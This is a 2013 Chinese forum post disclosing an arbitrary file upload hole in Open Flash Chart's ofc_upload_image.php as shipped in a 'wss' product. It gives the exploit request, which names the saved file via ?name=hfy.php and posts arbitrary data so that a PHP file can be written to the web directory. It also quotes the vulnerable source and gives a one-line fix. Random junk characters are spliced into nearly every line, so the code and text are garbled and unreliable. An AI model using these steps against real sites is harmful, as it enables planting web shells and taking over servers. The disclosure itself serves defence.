POST 数据漏洞文件执行任意后缀文件保存
( t5 O+ b& D1 M9 f 漏洞文件/chart/php-ofc-library/ofc_upload_image.php) U- p2 x4 X5 ]7 w5 ^+ M# v
" Z; R% w2 w8 k5 J L, ^% d利用:3 v5 o$ x. I4 ~: P" U. s
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名2 ~: v6 m ^9 d5 Y) T: D( {
: v* j# H2 W: D. ~Post任意数据* [# C5 x/ n- t$ X+ |
保存位置http://localhost/chart/tmp-upload-images/hfy.php& k2 j& N% h! D$ F3 G
# x2 A* O% p% `9 k( Z( D
& i5 l: X6 X5 [* u. |8 B- i. T
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
- \' m/ M2 } P. r6 A6 M9 O y. {0 _
<?php
) }% p$ \4 q/ @- O: o& J
! K" l! U- {5 @* s' h( ~//0 v1 h$ U8 [) V. A1 j
// In Open Flash Chart -> save_image debug mode, you5 H- R6 Z; }, s, u
// will see the 'echo' text in a new window.
$ I! P+ s+ K4 k) l/ M# w//
* V5 m- s# r4 O2 i5 @* k$ v0 b4 M. e& J& P' G
/*; t I# `1 F) x S i
9 A$ d! L8 ?3 H. B) x% n/ Q2 c
print_r( $_GET );
# P$ [1 u) I9 f- n" z. hprint_r( $_POST );6 h7 [/ n# Z* T6 B3 k! a3 K+ D0 F6 O) b
print_r( $_FILES );
* b* J( Y* h' {+ t# f
% F* F1 z4 W2 vprint_r( $GLOBALS );
7 p* W1 f4 t6 z2 Q3 X9 oprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
2 i, {- k& F. P: L
& u1 {4 i: G2 s7 Z8 K6 ^; |& k! X*/* m- \$ m# j0 O7 B: r1 ?
// default path for the image to be stored //4 w( C7 D' W( u! R- G
$default_path = '../tmp-upload-images/';! p6 R/ b9 V9 Q& u' N3 @ J O
7 O+ W+ Q3 n9 j
if (!file_exists($default_path)) mkdir($default_path, 0777, true);0 W! `! P) E5 u, ?# u7 v5 w) R( s
+ i S& k* M$ t' H// full path to the saved image including filename //
' v7 m% w7 |0 u! H$destination = $default_path . basename( $_GET[ 'name' ] );
0 F* W; e% u7 ~9 }6 E) ?5 s2 B, T( \2 F$ S$ |
echo 'Saving your image to: '. $destination;
# A: U: s) M. \3 f) I// print_r( $_POST );
, v5 F7 A( y8 N) x$ E Z// print_r( $_SERVER );1 L1 |. p: T! a! Y. {
// echo $HTTP_RAW_POST_DATA;3 B d6 l/ {* d% H# w
( q; p' E9 U$ n# \
//2 T' j% X: k! J. K$ ]5 x5 s
// POST data is usually string data, but we are passing a RAW .png
! g3 i# y1 Y& Q8 ^9 s Y* B8 q// so PHP is a bit confused and $_POST is empty. But it has saved- `2 A, V( S, O3 x, @$ {
// the raw bits into $HTTP_RAW_POST_DATA
: o4 P' B7 p1 K8 Q# T l8 @2 K0 u//
! \ V+ V+ v" B7 T) m
+ n- |, {1 _' K! E5 g7 E$jfh = fopen($destination, 'w') or die("can't open file");, C0 \' ]: W7 B7 [/ D
fwrite($jfh, $HTTP_RAW_POST_DATA);
5 |6 a: P! N# x& V% c+ G; ofclose($jfh);& g/ M7 L" p5 z
- u' A: X. h( [//+ x( e3 a: X# [1 [! P7 L; b
// LOOK:# I! O0 o: a' g* J5 U5 x& ~5 w
//
3 v* C( W* {3 ?" x' |, nexit();! ?' j/ ^. N) m/ c: Q I
//
5 k7 j$ I& ]' H: u. _: L9 b// PHP5:
1 i) K( O- h$ D' ~4 f% V" V$ K! E//
8 B( x% {' v* N+ ?
1 @" R- p; \3 }9 @6 r9 B7 j8 a' u& w- _
// default path for the image to be stored //0 f2 K" E6 {( I* K, G/ w3 d
$default_path = 'tmp-upload-images/';
7 P ~/ c) {' B- f8 R9 M5 x4 u. t6 ^; E! [( t* D
if (!file_exists($default_path)) mkdir($default_path, 0777, true);0 X% F+ R$ E# S( F7 ~' {
- E4 ^8 ?1 d' t5 N7 M U// full path to the saved image including filename //
) s. q* M. ?/ j1 |* @: c$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); ( @! B( c5 t1 ?+ C$ L5 s8 D
1 V1 Q: \' _+ {
// move the image into the specified directory //' |" {9 m, X: M9 h) K) ~
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {+ z7 B1 a; e- L, O1 K6 D) w
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";0 L n0 T0 u' h8 [
} else {
: H: x/ j2 n' h/ H0 ~0 v- W echo "FILE UPLOAD FAILED";
4 C. [7 a5 o% ~5 K# h5 n}
: |" ?# Y& l* U' t# I4 h, x% P5 a, ~8 ]4 \
! f5 k! d8 w8 h8 ~" K4 g
?>
9 w# D0 m# {' B% I, b
2 P4 X8 L* S- p8 G' `9 i# ?9 g8 y9 s" J' |/ g
' x" u' D. D' N( g. r! Q" Z* t
& }- v* M) H3 q# d r, y0 x6 n% A( B4 X H2 x* @% G! Y
8 J- q% ]. e4 w: Z
修复方案:
0 R. ~9 J: h) x这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
+ ]- `' @& u9 n- M( X
$ R" p, C; k% X7 h! ~, }& Z" j1 U2 A' F& q7 B& R, n
7 p- Y* y8 Z# w% Y5 n5 k( G
' m$ y/ Q: X3 o. v! w# ^ |
发表于 2013-2-23 12:38:58
收藏
支持
反对